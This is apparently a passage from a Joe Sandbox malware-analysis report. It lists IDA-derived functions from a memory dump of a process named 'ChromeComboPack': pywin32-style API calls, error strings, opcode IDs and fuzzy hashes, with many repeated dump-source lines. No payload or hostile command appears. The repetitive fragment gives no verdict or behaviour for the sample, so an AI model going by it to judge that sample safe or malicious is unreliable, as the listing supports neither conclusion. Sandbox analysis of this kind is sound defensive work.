                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334594378.00007FFD8A1AE000.00000004.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334672429.00007FFD8A1B1000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_7ffd8a190000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: List_$AppendDealloc
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1573934073-0
                                                                                                                                                                                                                                                • Opcode ID: f8b13b4d65d2c7b560fe5343b90ac936291079483877ea91accc04f82460e21b
                                                                                                                                                                                                                                                • Instruction ID: 1f0d16dd0432273f8c406ebdcaea2779322e6547767e59f724a6ec73ecb0ae4c
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f8b13b4d65d2c7b560fe5343b90ac936291079483877ea91accc04f82460e21b
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 72314C26B0FA45A5FA594F15A56013967B0BF44FA4F9C42B0DA6E077E4EF2CF451C300
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000022.00000002.4334440478.00007FFD8A191000.00000020.00000001.01000000.00000092.sdmp, Offset: 00007FFD8A190000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334365318.00007FFD8A190000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334522969.00007FFD8A1A0000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334594378.00007FFD8A1AE000.00000004.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334672429.00007FFD8A1B1000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_7ffd8a190000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: List_$AppendBytes_DeallocFromSizeString
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3583985797-0
                                                                                                                                                                                                                                                • Opcode ID: b6289df08c14415418b15139dd86ea7f23e8c96486d306a0b356c10dd46804b6
                                                                                                                                                                                                                                                • Instruction ID: 4b1996e79f7fb203e5690ab03c02dad8fb09e6f188edda62744c6c36d67ce55e
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b6289df08c14415418b15139dd86ea7f23e8c96486d306a0b356c10dd46804b6
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9B211C22B0FA4565EA599F25A86423866A1BF49FA4F4C1270DE6E467D4EF2CE451C300
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • _Py_NewReference.PYTHON312(?,?,?,00007FFD8A196D86), ref: 00007FFD8A196E6D
                                                                                                                                                                                                                                                  • Part of subcall function 00007FFD8A19E3C8: malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFD8A19E3E2
                                                                                                                                                                                                                                                • _Py_NewReference.PYTHON312(?,?,?,00007FFD8A196D86), ref: 00007FFD8A196E9A
                                                                                                                                                                                                                                                • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFD8A196D86), ref: 00007FFD8A196EA5
                                                                                                                                                                                                                                                • InitializeSecurityDescriptor.ADVAPI32(?,?,?,00007FFD8A196D86), ref: 00007FFD8A196EBE
                                                                                                                                                                                                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFD8A196D86), ref: 00007FFD8A196ED6
                                                                                                                                                                                                                                                • _Py_Dealloc.PYTHON312(?,?,?,00007FFD8A196D86), ref: 00007FFD8A196EF6
                                                                                                                                                                                                                                                  • Part of subcall function 00007FFD8A197B40: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFD8A191911), ref: 00007FFD8A197B5B
                                                                                                                                                                                                                                                  • Part of subcall function 00007FFD8A197B40: GetSecurityDescriptorLength.ADVAPI32(?,?,?,00007FFD8A191911), ref: 00007FFD8A197B64
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000022.00000002.4334440478.00007FFD8A191000.00000020.00000001.01000000.00000092.sdmp, Offset: 00007FFD8A190000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334365318.00007FFD8A190000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334522969.00007FFD8A1A0000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334594378.00007FFD8A1AE000.00000004.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334672429.00007FFD8A1B1000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_7ffd8a190000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: DescriptorReferenceSecurityfreemalloc$DeallocInitializeLength
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2040291429-0
                                                                                                                                                                                                                                                • Opcode ID: 144ac3daedd37543ad79c42905b113054fa9168fe074a7adbcc65c11bb02cba7
                                                                                                                                                                                                                                                • Instruction ID: a227e582ac435dda1b0b10da6c5b419ec0aa6522f816ebd81bdc75185bbdab05
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 144ac3daedd37543ad79c42905b113054fa9168fe074a7adbcc65c11bb02cba7
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 33212736B0AB05A2EB488F21E96423977B4FB48F84F544574DA4D03BA5DF7CE565C340
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000022.00000002.4334440478.00007FFD8A191000.00000020.00000001.01000000.00000092.sdmp, Offset: 00007FFD8A190000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334365318.00007FFD8A190000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334522969.00007FFD8A1A0000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334594378.00007FFD8A1AE000.00000004.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334672429.00007FFD8A1B1000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_7ffd8a190000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: DeallocValue$DeleteFreeLocalState_Thread
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1066789969-0
                                                                                                                                                                                                                                                • Opcode ID: 184bcfdcaf00f2f60805a083e4a3c7233bfc85e00bd7b69ac5073c6e02f5c8ec
                                                                                                                                                                                                                                                • Instruction ID: 068209d2e46d06e22e529ea02ef7106e4636702ac5da21d7d2534ad3857eaad3
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 184bcfdcaf00f2f60805a083e4a3c7233bfc85e00bd7b69ac5073c6e02f5c8ec
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9701E936F0BA06A1FA5D9F25A9741343AA1BF88F94F5900F5C94E12261DF3CB845C210
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000022.00000002.4334440478.00007FFD8A191000.00000020.00000001.01000000.00000092.sdmp, Offset: 00007FFD8A190000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334365318.00007FFD8A190000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334522969.00007FFD8A1A0000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334594378.00007FFD8A1AE000.00000004.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334672429.00007FFD8A1B1000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_7ffd8a190000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Unicode_
                                                                                                                                                                                                                                                • String ID: Internal$InternalHigh$hEvent
                                                                                                                                                                                                                                                • API String ID: 2646675794-1769053571
                                                                                                                                                                                                                                                • Opcode ID: f1d39640334fae646abf404db770a728ad25418bece115b56819633ea03a6ba7
                                                                                                                                                                                                                                                • Instruction ID: c5a874426ada28fa78bc34710407fb67ac2473f7e5ee9016d69f8aff60bcec62
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f1d39640334fae646abf404db770a728ad25418bece115b56819633ea03a6ba7
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D9217127B1AE8191EB598F16E5600796B60FB88FD4F4C5071EF9E13B59EE2CE491C700
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000022.00000002.4334440478.00007FFD8A191000.00000020.00000001.01000000.00000092.sdmp, Offset: 00007FFD8A190000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334365318.00007FFD8A190000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334522969.00007FFD8A1A0000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334594378.00007FFD8A1AE000.00000004.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334672429.00007FFD8A1B1000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_7ffd8a190000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Arg_DescriptorInitializeParseSecurityTuple
                                                                                                                                                                                                                                                • String ID: :Initialize$InitializeSecurityDescriptor
                                                                                                                                                                                                                                                • API String ID: 3008588735-475701968
                                                                                                                                                                                                                                                • Opcode ID: a607c9aa78ca3169caf3f180d21fd4df5d9479bcf2dc38f2f5468736b10cb754
                                                                                                                                                                                                                                                • Instruction ID: 25d962c2868ba80aee9635caf249eb6d52d401f338d4b5909661d2a0719b9292
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a607c9aa78ca3169caf3f180d21fd4df5d9479bcf2dc38f2f5468736b10cb754
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 27114527B1DA4191EB488F16A55027A67A1FF88FC4F9C5071EE5E47B59DF2CE442C700
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000022.00000002.4334440478.00007FFD8A191000.00000020.00000001.01000000.00000092.sdmp, Offset: 00007FFD8A190000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334365318.00007FFD8A190000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334522969.00007FFD8A1A0000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334594378.00007FFD8A1AE000.00000004.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334672429.00007FFD8A1B1000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_7ffd8a190000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Arg_ParseReferenceTuple
                                                                                                                                                                                                                                                • String ID: The object is not a PyHANDLE object$|O:HANDLERegistry
                                                                                                                                                                                                                                                • API String ID: 709158290-3143913545
                                                                                                                                                                                                                                                • Opcode ID: d50cbd8e4d7ce53099b5c43a06c2957648a9a4a107dfa02c32a3319bf10f1a76
                                                                                                                                                                                                                                                • Instruction ID: 42497ab386810d4b1b6ab7de7d20a6b43aef10dd08ddbd3d6e0af02c5616da0e
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d50cbd8e4d7ce53099b5c43a06c2957648a9a4a107dfa02c32a3319bf10f1a76
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2F211732B0AA52A1EB488F12F4A00B977B4FB84B84F985072DA4D53664EF3CE5A5C740
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000022.00000002.4334440478.00007FFD8A191000.00000020.00000001.01000000.00000092.sdmp, Offset: 00007FFD8A190000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334365318.00007FFD8A190000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334522969.00007FFD8A1A0000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334594378.00007FFD8A1AE000.00000004.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334672429.00007FFD8A1B1000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_7ffd8a190000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Arg_ParseReferenceTuple
                                                                                                                                                                                                                                                • String ID: The object is not a PyHANDLE object$|O:HANDLE
                                                                                                                                                                                                                                                • API String ID: 709158290-2911939918
                                                                                                                                                                                                                                                • Opcode ID: 32da26a186c7aa4914931394e7c6df3db8a8ee8773740c1db7cd4f19ad8b0cef
                                                                                                                                                                                                                                                • Instruction ID: 1e7ef98b117cd5d66ac28179b02ee71747d8ba3086f7b3073ae91185b0fba099
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 32da26a186c7aa4914931394e7c6df3db8a8ee8773740c1db7cd4f19ad8b0cef
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 55213933B1AA42A1EB488F15E4A007967B0FB84B84F985071EA4D47664EF3CE561C740
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000022.00000002.4334440478.00007FFD8A191000.00000020.00000001.01000000.00000092.sdmp, Offset: 00007FFD8A190000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334365318.00007FFD8A190000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334522969.00007FFD8A1A0000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334594378.00007FFD8A1AE000.00000004.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334672429.00007FFD8A1B1000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_7ffd8a190000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CharDeallocFromObject_PrintUnicode_Widewsprintf
                                                                                                                                                                                                                                                • String ID: <%hs at %Id (%Id)>
                                                                                                                                                                                                                                                • API String ID: 2754229576-3200932714
                                                                                                                                                                                                                                                • Opcode ID: e2c73810facc8508b6838acf4e95acea6fe770c862bcc3c3d108e358108a0f53
                                                                                                                                                                                                                                                • Instruction ID: 4f09ccb754dc5c9dd8fbdf51dd804ed947a8654a9fcf450d36bc92d9b52c1453
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e2c73810facc8508b6838acf4e95acea6fe770c862bcc3c3d108e358108a0f53
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 82119373B16B45A5FB588F15E8147B967A0BB98FA4F845171DE1E037A0EE3CE149C300
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000022.00000002.4334440478.00007FFD8A191000.00000020.00000001.01000000.00000092.sdmp, Offset: 00007FFD8A190000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334365318.00007FFD8A190000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334522969.00007FFD8A1A0000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334594378.00007FFD8A1AE000.00000004.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334672429.00007FFD8A1B1000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_7ffd8a190000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Time$Arg_DateFileParseSizeTuple_
                                                                                                                                                                                                                                                • String ID: DosDateTimeToFileTime$FileTimeToSystemTime
                                                                                                                                                                                                                                                • API String ID: 2214670548-3006328108
                                                                                                                                                                                                                                                • Opcode ID: 87dbc75f81b642d7e03782057ba3e3b8bd81e33503cd8eb33867510604a29585
                                                                                                                                                                                                                                                • Instruction ID: f8fab316d732241cf2df56396038fc8334cc3f632317f1bfc7ed793ab2a79a5f
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 87dbc75f81b642d7e03782057ba3e3b8bd81e33503cd8eb33867510604a29585
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2C114557F09942B5FA58EF21E8711BA77A1FFC4B48FC810B2E68E42555EE2CE615CB00
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000022.00000002.4334440478.00007FFD8A191000.00000020.00000001.01000000.00000092.sdmp, Offset: 00007FFD8A190000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334365318.00007FFD8A190000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334522969.00007FFD8A1A0000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334594378.00007FFD8A1AE000.00000004.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334672429.00007FFD8A1B1000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_7ffd8a190000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Err_Formatmemcpyrealloc
                                                                                                                                                                                                                                                • String ID: SetACL: Unable to reallocate ACL to size %d
                                                                                                                                                                                                                                                • API String ID: 2667793433-1849531889
                                                                                                                                                                                                                                                • Opcode ID: b9ae1438e4236204653b7ae9cedeb3c3a4368ced16903ebafc281e17da4f6f3c
                                                                                                                                                                                                                                                • Instruction ID: a69bd42a155456e43fd12466baaf9c20e02620928e1fc40165352237d7f98787
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b9ae1438e4236204653b7ae9cedeb3c3a4368ced16903ebafc281e17da4f6f3c
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 75119022B1AB91A2E7589F12E451179BBB0FB88FC0B488475EE8D47B59DF7CE490C700
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000022.00000002.4334440478.00007FFD8A191000.00000020.00000001.01000000.00000092.sdmp, Offset: 00007FFD8A190000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334365318.00007FFD8A190000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334522969.00007FFD8A1A0000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334594378.00007FFD8A1AE000.00000004.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334672429.00007FFD8A1B1000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_7ffd8a190000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Err_String
                                                                                                                                                                                                                                                • String ID: Object must be a PyDEVMODEW$PyDEVMODE cannot be None in this context
                                                                                                                                                                                                                                                • API String ID: 1450464846-2899910425
                                                                                                                                                                                                                                                • Opcode ID: 0fb4a806d0ccb91fd8fc5085e5c0bcb0dcf69eaf29f9219200685665ecb88d4e
                                                                                                                                                                                                                                                • Instruction ID: fbfd5b177b905db49219103a80536676eb6277c39139402fbb7054dc1c6091e7
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0fb4a806d0ccb91fd8fc5085e5c0bcb0dcf69eaf29f9219200685665ecb88d4e
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 91117763B1AA0691EF588F19F4A067827A0FB88F88F985471DA1D47765EE3DE491C700
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • PyLong_AsVoidPtr.PYTHON312 ref: 00007FFD8A19CD95
                                                                                                                                                                                                                                                • PyErr_Occurred.PYTHON312 ref: 00007FFD8A19CDA3
                                                                                                                                                                                                                                                • PyErr_Clear.PYTHON312 ref: 00007FFD8A19CDAE
                                                                                                                                                                                                                                                  • Part of subcall function 00007FFD8A19CB50: PyNumber_Long.PYTHON312(?,?,?,00007FFD8A194F6E), ref: 00007FFD8A19CB65
                                                                                                                                                                                                                                                  • Part of subcall function 00007FFD8A19CB50: PyErr_Occurred.PYTHON312(?,?,?,00007FFD8A194F6E), ref: 00007FFD8A19CB73
                                                                                                                                                                                                                                                  • Part of subcall function 00007FFD8A19CB50: PyLong_AsLongLong.PYTHON312(?,?,?,00007FFD8A194F6E), ref: 00007FFD8A19CB81
                                                                                                                                                                                                                                                  • Part of subcall function 00007FFD8A19CB50: PyErr_Occurred.PYTHON312(?,?,?,00007FFD8A194F6E), ref: 00007FFD8A19CB90
                                                                                                                                                                                                                                                  • Part of subcall function 00007FFD8A19CB50: PyErr_Clear.PYTHON312(?,?,?,00007FFD8A194F6E), ref: 00007FFD8A19CB9B
                                                                                                                                                                                                                                                  • Part of subcall function 00007FFD8A19CB50: PyLong_AsUnsignedLongLong.PYTHON312(?,?,?,00007FFD8A194F6E), ref: 00007FFD8A19CBA4
                                                                                                                                                                                                                                                  • Part of subcall function 00007FFD8A19CB50: PyErr_Occurred.PYTHON312(?,?,?,00007FFD8A194F6E), ref: 00007FFD8A19CBB3
                                                                                                                                                                                                                                                  • Part of subcall function 00007FFD8A19CB50: _Py_Dealloc.PYTHON312(?,?,?,00007FFD8A194F6E), ref: 00007FFD8A19CBC7
                                                                                                                                                                                                                                                  • Part of subcall function 00007FFD8A19CB50: PyErr_Format.PYTHON312(?,?,?,00007FFD8A194F6E), ref: 00007FFD8A19CBE6
                                                                                                                                                                                                                                                • PyErr_Format.PYTHON312 ref: 00007FFD8A19CDDC
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000022.00000002.4334440478.00007FFD8A191000.00000020.00000001.01000000.00000092.sdmp, Offset: 00007FFD8A190000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334365318.00007FFD8A190000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334522969.00007FFD8A1A0000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334594378.00007FFD8A1AE000.00000004.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334672429.00007FFD8A1B1000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_7ffd8a190000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Err_$Long$Occurred$Long_$ClearFormat$DeallocNumber_UnsignedVoid
                                                                                                                                                                                                                                                • String ID: WPARAM is simple, so must be an int object (got %s)
                                                                                                                                                                                                                                                • API String ID: 4021378859-3057595559
                                                                                                                                                                                                                                                • Opcode ID: 3e07ab2fde876340903de18c603ba2189048f057fcc304b848261276f66459d7
                                                                                                                                                                                                                                                • Instruction ID: 3721a81861ba376f732f5abfee0d470c4502b140c8655397528a854961097726
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3e07ab2fde876340903de18c603ba2189048f057fcc304b848261276f66459d7
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8E014C22B1AB8295EA488F16F4601696BA0FF48FD8F485071EE8E57754DE3CE491C340
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000022.00000002.4334440478.00007FFD8A191000.00000020.00000001.01000000.00000092.sdmp, Offset: 00007FFD8A190000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334365318.00007FFD8A190000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334522969.00007FFD8A1A0000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334594378.00007FFD8A1AE000.00000004.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334672429.00007FFD8A1B1000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_7ffd8a190000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Authority$Arg_CountErr_ParseSizeStringTuple_
                                                                                                                                                                                                                                                • String ID: The index is out of range
                                                                                                                                                                                                                                                • API String ID: 2377407092-505141048
                                                                                                                                                                                                                                                • Opcode ID: ab659c3e0758885cbb4e411234c526d0d92208241b1e3b98633725ba134c73f6
                                                                                                                                                                                                                                                • Instruction ID: e3bc3e8475c11ce3f7b61cd98c966b49088fa6ec1bbc2336546f8dd4860bfb79
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ab659c3e0758885cbb4e411234c526d0d92208241b1e3b98633725ba134c73f6
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7A012D66B1AA42A2EB088F21E8A41B93760FBC4F95F445072DA5E47364DF3CE494C700
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000022.00000002.4334440478.00007FFD8A191000.00000020.00000001.01000000.00000092.sdmp, Offset: 00007FFD8A190000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334365318.00007FFD8A190000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334522969.00007FFD8A1A0000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334594378.00007FFD8A1AE000.00000004.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334672429.00007FFD8A1B1000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_7ffd8a190000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Long$FromLong_$BuildSizeValue_
                                                                                                                                                                                                                                                • String ID: NiNNi(ii)
                                                                                                                                                                                                                                                • API String ID: 4007579727-1588869203
